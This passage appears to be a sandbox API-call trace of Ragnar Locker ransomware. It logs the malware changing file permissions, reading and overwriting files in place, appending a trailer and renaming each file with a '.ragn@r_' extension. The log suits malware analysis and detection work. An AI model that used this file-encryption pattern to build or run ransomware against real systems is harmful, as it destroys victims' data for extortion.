nNumberOfBytesToUnlockHigh=0x0) returned 1 [0168.991] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0168.991] SetFilePointerEx (in: hFile=0x3c8, liDistanceToMove=0x1d8f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.991] LockFile (hFile=0x3c8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0168.991] WriteFile (in: hFile=0x3c8, lpBuffer=0x5d1cfbc*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5fffe5c, lpOverlapped=0x0 | out: lpBuffer=0x5d1cfbc*, lpNumberOfBytesWritten=0x5fffe5c*=0x100, lpOverlapped=0x0) returned 1 [0168.992] WriteFile (in: hFile=0x3c8, lpBuffer=0x5d1d0bc*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5fffe5c, lpOverlapped=0x0 | out: lpBuffer=0x5d1d0bc*, lpNumberOfBytesWritten=0x5fffe5c*=0x100, lpOverlapped=0x0) returned 1 [0168.992] WriteFile (in: hFile=0x3c8, lpBuffer=0x5fffe60*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x5fffe5c, lpOverlapped=0x0 | out: lpBuffer=0x5fffe60*, lpNumberOfBytesWritten=0x5fffe5c*=0xf, lpOverlapped=0x0) returned 1 [0168.992] UnlockFile (hFile=0x3c8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0168.992] GetProcessHeap () returned 0x3520000 [0168.992] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x3584b08 | out: hHeap=0x3520000) returned 1 [0168.992] CloseHandle (hObject=0x3c8) returned 1 [0168.993] lstrcpyW (in: lpString1=0x5fff9cc, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1025\\eula.rtf" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1025\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1025\\eula.rtf" [0168.994] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1025\\eula.rtf", lpString2=".ragn@r_B8CF767A" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1025\\eula.rtf.ragn@r_B8CF767A") returned="\\\\?\\C:\\588bce7c90097ed212\\1025\\eula.rtf.ragn@r_B8CF767A" [0168.994] MoveFileExW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1025\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\eula.rtf.ragn@r_B8CF767A" (normalized: "c:\\588bce7c90097ed212\\1025\\eula.rtf.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Thread: id = 186 os_tid = 0x11e0 [0169.008] GetNamedSecurityInfoW () returned 0x0 [0169.009] SetEntriesInAclW () returned 0x0 [0169.009] SetNamedSecurityInfoW () returned 0x0 [0169.010] LocalFree (hMem=0x35cd880) returned 0x0 [0169.010] LocalFree (hMem=0x35cd894) returned 0x35cd894 [0169.010] LocalFree (hMem=0x3592eb0) returned 0x0 [0169.010] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1025\\localizeddata.xml")) returned 0x20 [0169.010] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1025\\localizeddata.xml"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x3c8 [0169.010] GetFileSizeEx (in: hFile=0x3c8, lpFileSize=0x627fb74 | out: lpFileSize=0x627fb74*=74214) returned 1 [0169.010] SetFilePointerEx (in: hFile=0x3c8, liDistanceToMove=0x121d7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.010] GetProcessHeap () returned 0x3520000 [0169.010] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x3584dd8 [0169.011] ReadFile (in: hFile=0x3c8, lpBuffer=0x3584dd8, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x627fb2c, lpOverlapped=0x0 | out: lpBuffer=0x3584dd8*, lpNumberOfBytesRead=0x627fb2c*=0xf, lpOverlapped=0x0) returned 1 [0169.013] VirtualAlloc (lpAddress=0x0, dwSize=0x121e6, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0169.017] SetFilePointerEx (in: hFile=0x3c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.017] SetFilePointerEx (in: hFile=0x3c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x627fb48 | out: lpNewFilePointer=0x0) returned 1 [0169.017] ReadFile (in: hFile=0x3c8, lpBuffer=0x2f70000, nNumberOfBytesToRead=0x121e6, lpNumberOfBytesRead=0x627fb1c, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesRead=0x627fb1c*=0x121e6, lpOverlapped=0x0) returned 1 [0169.022] SetFilePointerEx (in: hFile=0x3c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x627fb20 | out: lpNewFilePointer=0x0) returned 1 [0169.023] LockFile (hFile=0x3c8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x121e6, nNumberOfBytesToLockHigh=0x0) returned 1 [0169.023] WriteFile (in: hFile=0x3c8, lpBuffer=0x2f70000*, nNumberOfBytesToWrite=0x121e6, lpNumberOfBytesWritten=0x627fb18, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesWritten=0x627fb18*=0x121e6, lpOverlapped=0x0) returned 1 [0169.024] UnlockFile (hFile=0x3c8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x121e6, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0169.024] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0169.025] SetFilePointerEx (in: hFile=0x3c8, liDistanceToMove=0x121e6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.025] LockFile (hFile=0x3c8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0169.025] WriteFile (in: hFile=0x3c8, lpBuffer=0x5d2a134*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x627fb58, lpOverlapped=0x0 | out: lpBuffer=0x5d2a134*, lpNumberOfBytesWritten=0x627fb58*=0x100, lpOverlapped=0x0) returned 1 [0169.025] WriteFile (in: hFile=0x3c8, lpBuffer=0x5d2a234*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x627fb58, lpOverlapped=0x0 | out: lpBuffer=0x5d2a234*, lpNumberOfBytesWritten=0x627fb58*=0x100, lpOverlapped=0x0) returned 1 [0169.026] WriteFile (in: hFile=0x3c8, lpBuffer=0x627fb5c*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x627fb58, lpOverlapped=0x0 | out: lpBuffer=0x627fb5c*, lpNumberOfBytesWritten=0x627fb58*=0xf, lpOverlapped=0x0) returned 1 [0169.026] UnlockFile (hFile=0x3c8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0169.026] GetProcessHeap () returned 0x3520000 [0169.026] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x3584dd8 | out: hHeap=0x3520000) returned 1 [0169.026] CloseHandle (hObject=0x3c8) returned 1 [0169.032] lstrcpyW (in: lpString1=0x627f6c8, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1025\\LocalizedData.xml" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1025\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1025\\LocalizedData.xml" [0169.032] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1025\\LocalizedData.xml", lpString2=".ragn@r_B8CF767A" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1025\\LocalizedData.xml.ragn@r_B8CF767A") returned="\\\\?\\C:\\588bce7c90097ed212\\1025\\LocalizedData.xml.ragn@r_B8CF767A" [0169.032] MoveFileExW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1025\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\LocalizedData.xml.ragn@r_B8CF767A" (normalized: "c:\\588bce7c90097ed212\\1025\\localizeddata.xml.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Thread: id = 187 os_tid = 0x5b8 [0169.505] GetNamedSecurityInfoW () returned 0x0 [0169.506] SetEntriesInAclW () returned 0x0 [0169.506] SetNamedSecurityInfoW () returned 0x0 [0169.507] LocalFree (hMem=0x35cd880) returned 0x0 [0169.507] LocalFree (hMem=0x35cd894) returned 0x35cd894 [0169.507] LocalFree (hMem=0x3592eb0) returned 0x0 [0169.507] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1028\\eula.rtf")) returned 0x20 [0169.507] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1028\\eula.rtf"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x384 [0169.507] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x5fffa9c | out: lpFileSize=0x5fffa9c*=6309) returned 1 [0169.507] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x1896, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.507] GetProcessHeap () returned 0x3520000 [0169.508] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x3584da8 [0169.508] ReadFile (in: hFile=0x384, lpBuffer=0x3584da8, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x5fffa54, lpOverlapped=0x0 | out: lpBuffer=0x3584da8*, lpNumberOfBytesRead=0x5fffa54*=0xf, lpOverlapped=0x0) returned 1 [0169.510] VirtualAlloc (lpAddress=0x0, dwSize=0x18a5, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0169.511] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.511] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5fffa70 | out: lpNewFilePointer=0x0) returned 1 [0169.511] ReadFile (in: hFile=0x384, lpBuffer=0x2f70000, nNumberOfBytesToRead=0x18a5, lpNumberOfBytesRead=0x5fffa44, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesRead=0x5fffa44*=0x18a5, lpOverlapped=0x0) returned 1 [0169.513] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5fffa48 | out: lpNewFilePointer=0x0) returned 1 [0169.513] LockFile (hFile=0x384, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x18a5, nNumberOfBytesToLockHigh=0x0) returned 1 [0169.513] WriteFile (in: hFile=0x384, lpBuffer=0x2f70000*, nNumberOfBytesToWrite=0x18a5, lpNumberOfBytesWritten=0x5fffa40, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesWritten=0x5fffa40*=0x18a5, lpOverlapped=0x0) returned 1 [0169.513] UnlockFile (hFile=0x384, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x18a5, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0169.513] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0169.514] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x18a5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.514] LockFile (hFile=0x384, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0169.514] WriteFile (in: hFile=0x384, lpBuffer=0x361339c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5fffa80, lpOverlapped=0x0 | out: lpBuffer=0x361339c*, lpNumberOfBytesWritten=0x5fffa80*=0x100, lpOverlapped=0x0) returned 1 [0169.514] WriteFile (in: hFile=0x384, lpBuffer=0x361349c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5fffa80, lpOverlapped=0x0 | out: lpBuffer=0x361349c*, lpNumberOfBytesWritten=0x5fffa80*=0x100, lpOverlapped=0x0) returned 1 [0169.514] WriteFile (in: hFile=0x384, lpBuffer=0x5fffa84*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x5fffa80, lpOverlapped=0x0 | out: lpBuffer=0x5fffa84*, lpNumberOfBytesWritten=0x5fffa80*=0xf, lpOverlapped=0x0) returned 1 [0169.514] UnlockFile (hFile=0x384, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0169.514] GetProcessHeap () returned 0x3520000 [0169.514] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x3584da8 | out: hHeap=0x3520000) returned 1 [0169.515] CloseHandle (hObject=0x384) returned 1 [0169.516] lstrcpyW (in: lpString1=0x5fff5f0, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1028\\eula.rtf" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1028\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1028\\eula.rtf" [0169.516] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1028\\eula.rtf", lpString2=".ragn@r_B8CF767A" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1028\\eula.rtf.ragn@r_B8CF767A") returned="\\\\?\\C:\\588bce7c90097ed212\\1028\\eula.rtf.ragn@r_B8CF767A" [0169.516] MoveFileExW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1028\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\eula.rtf.ragn@r_B8CF767A" (normalized: "c:\\588bce7c90097ed212\\1028\\eula.rtf.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Thread: id = 188 os_tid = 0xa80 [0169.738] GetNamedSecurityInfoW () returned 0x0 [0169.739] SetEntriesInAclW () returned 0x0 [0169.739] SetNamedSecurityInfoW () returned 0x0 [0169.740] LocalFree (hMem=0x35cd1b0) returned 0x0 [0169.740] LocalFree (hMem=0x35cd1c4) returned 0x35cd1c4 [0169.740] LocalFree (hMem=0x3592eb0) returned 0x0 [0169.740] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1028\\localizeddata.xml")) returned 0x20 [0169.740] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1028\\localizeddata.xml"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x384 [0169.740] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x5eff7d8 | out: lpFileSize=0x5eff7d8*=60816) returned 1 [0169.741] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0xed81, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.741] GetProcessHeap () returned 0x3520000 [0169.741] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x3584d18 [0169.741] ReadFile (in: hFile=0x384, lpBuffer=0x3584d18, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x5eff790, lpOverlapped=0x0 | out: lpBuffer=0x3584d18*, lpNumberOfBytesRead=0x5eff790*=0xf, lpOverlapped=0x0) returned 1 [0169.743] VirtualAlloc (lpAddress=0x0, dwSize=0xed90, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0169.744] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.744] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5eff7ac | out: lpNewFilePointer=0x0) returned 1 [0169.744] ReadFile (in: hFile=0x384, lpBuffer=0x2f70000, nNumberOfBytesToRead=0xed90, lpNumberOfBytesRead=0x5eff780, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesRead=0x5eff780*=0xed90, lpOverlapped=0x0) returned 1 [0169.747] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5eff784 | out: lpNewFilePointer=0x0) returned 1 [0169.748] LockFile (hFile=0x384, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xed90, nNumberOfBytesToLockHigh=0x0) returned 1 [0169.748] WriteFile (in: hFile=0x384, lpBuffer=0x2f70000*, nNumberOfBytesToWrite=0xed90, lpNumberOfBytesWritten=0x5eff77c, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesWritten=0x5eff77c*=0xed90, lpOverlapped=0x0) returned 1 [0169.748] UnlockFile (hFile=0x384, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xed90, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0169.748] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0169.749] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0xed90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.749] LockFile (hFile=0x384, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0169.749] WriteFile (in: hFile=0x384, lpBuffer=0x5d1cfbc*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5eff7bc, lpOverlapped=0x0 | out: lpBuffer=0x5d1cfbc*, lpNumberOfBytesWritten=0x5eff7bc*=0x100, lpOverlapped=0x0) returned 1 [0169.750] WriteFile (in: hFile=0x384, lpBuffer=0x5d1d0bc*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5eff7bc, lpOverlapped=0x0 | out: lpBuffer=0x5d1d0bc*, lpNumberOfBytesWritten=0x5eff7bc*=0x100, lpOverlapped=0x0) returned 1 [0169.750] WriteFile (in: hFile=0x384, lpBuffer=0x5eff7c0*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x5eff7bc, lpOverlapped=0x0 | out: lpBuffer=0x5eff7c0*, lpNumberOfBytesWritten=0x5eff7bc*=0xf, lpOverlapped=0x0) returned 1 [0169.750] UnlockFile (hFile=0x384, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0169.750] GetProcessHeap () returned 0x3520000 [0169.750] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x3584d18 | out: hHeap=0x3520000) returned 1 [0169.750] CloseHandle (hObject=0x384) returned 1 [0169.756] lstrcpyW (in: lpString1=0x5eff32c, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1028\\LocalizedData.xml" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1028\\LocalizedData.xml" [0169.756] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1028\\LocalizedData.xml", lpString2=".ragn@r_B8CF767A" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1028\\LocalizedData.xml.ragn@r_B8CF767A") returned="\\\\?\\C:\\588bce7c90097ed212\\1028\\LocalizedData.xml.ragn@r_B8CF767A" [0169.756] MoveFileExW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1028\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\LocalizedData.xml.ragn@r_B8CF767A" (normalized: "c:\\588bce7c90097ed212\\1028\\localizeddata.xml.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Thread: id = 189 os_tid = 0x6e0 [0170.132] GetNamedSecurityInfoW () returned 0x0 [0170.135] SetEntriesInAclW () returned 0x0 [0170.135] SetNamedSecurityInfoW () returned 0x0 [0170.139] LocalFree (hMem=0x35cd1b0) returned 0x0 [0170.139] LocalFree (hMem=0x35cd1c4) returned 0x35cd1c4 [0170.139] LocalFree (hMem=0x355e408) returned 0x0 [0170.139] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1029\\eula.rtf")) returned 0x20 [0170.139] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1029\\eula.rtf"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x3b8 [0170.139] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x5affa84 | out: lpFileSize=0x5affa84*=3726) returned 1 [0170.140] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0xe7f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.140] GetProcessHeap () returned 0x3520000 [0170.140] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x35842c8 [0170.140] ReadFile (in: hFile=0x3b8, lpBuffer=0x35842c8, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x5affa3c, lpOverlapped=0x0 | out: lpBuffer=0x35842c8*, lpNumberOfBytesRead=0x5affa3c*=0xf, lpOverlapped=0x0) returned 1 [0170.143] VirtualAlloc (lpAddress=0x0, dwSize=0xe8e, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0170.144] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.144] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5affa58 | out: lpNewFilePointer=0x0) returned 1 [0170.144] ReadFile (in: hFile=0x3b8, lpBuffer=0x2f70000, nNumberOfBytesToRead=0xe8e, lpNumberOfBytesRead=0x5affa2c, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesRead=0x5affa2c*=0xe8e, lpOverlapped=0x0) returned 1 [0170.145] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5affa30 | out: lpNewFilePointer=0x0) returned 1 [0170.145] LockFile (hFile=0x3b8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xe8e, nNumberOfBytesToLockHigh=0x0) returned 1 [0170.145] WriteFile (in: hFile=0x3b8, lpBuffer=0x2f70000*, nNumberOfBytesToWrite=0xe8e, lpNumberOfBytesWritten=0x5affa28, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesWritten=0x5affa28*=0xe8e, lpOverlapped=0x0) returned 1 [0170.146] UnlockFile (hFile=0x3b8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xe8e, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0170.146] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0170.146] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0xe8e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.146] LockFile (hFile=0x3b8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0170.146] WriteFile (in: hFile=0x3b8, lpBuffer=0x361339c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5affa68, lpOverlapped=0x0 | out: lpBuffer=0x361339c*, lpNumberOfBytesWritten=0x5affa68*=0x100, lpOverlapped=0x0) returned 1 [0170.147] WriteFile (in: hFile=0x3b8, lpBuffer=0x361349c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5affa68, lpOverlapped=0x0 | out: lpBuffer=0x361349c*, lpNumberOfBytesWritten=0x5affa68*=0x100, lpOverlapped=0x0) returned 1 [0170.147] WriteFile (in: hFile=0x3b8, lpBuffer=0x5affa6c*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x5affa68, lpOverlapped=0x0 | out: lpBuffer=0x5affa6c*, lpNumberOfBytesWritten=0x5affa68*=0xf, lpOverlapped=0x0) returned 1 [0170.147] UnlockFile (hFile=0x3b8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0170.147] GetProcessHeap () returned 0x3520000 [0170.147] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x35842c8 | out: hHeap=0x3520000) returned 1 [0170.148] CloseHandle (hObject=0x3b8) returned 1 [0170.149] lstrcpyW (in: lpString1=0x5aff5d8, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1029\\eula.rtf" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1029\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1029\\eula.rtf" [0170.149] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1029\\eula.rtf", lpString2=".ragn@r_B8CF767A" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1029\\eula.rtf.ragn@r_B8CF767A") returned="\\\\?\\C:\\588bce7c90097ed212\\1029\\eula.rtf.ragn@r_B8CF767A" [0170.150] MoveFileExW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1029\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\eula.rtf.ragn@r_B8CF767A" (normalized: "c:\\588bce7c90097ed212\\1029\\eula.rtf.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Thread: id = 190 os_tid = 0xea4 [0170.420] GetNamedSecurityInfoW () returned 0x0 [0170.421] SetEntriesInAclW () returned 0x0 [0170.421] SetNamedSecurityInfoW () returned 0x0 [0170.422] LocalFree (hMem=0x35cd1b0) returned 0x0 [0170.422] LocalFree (hMem=0x35cd1c4) returned 0x35cd1c4 [0170.422] LocalFree (hMem=0x355e408) returned 0x0 [0170.422] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1029\\localizeddata.xml")) returned 0x20 [0170.422] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1029\\localizeddata.xml"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x3bc [0170.422] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x5affd50 | out: lpFileSize=0x5affd50*=80970) returned 1 [0170.422] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x13c3b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.422] GetProcessHeap () returned 0x3520000 [0170.422] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x35842c8 [0170.423] ReadFile (in: hFile=0x3bc, lpBuffer=0x35842c8, nNumberOfBytesToRead=0xf, 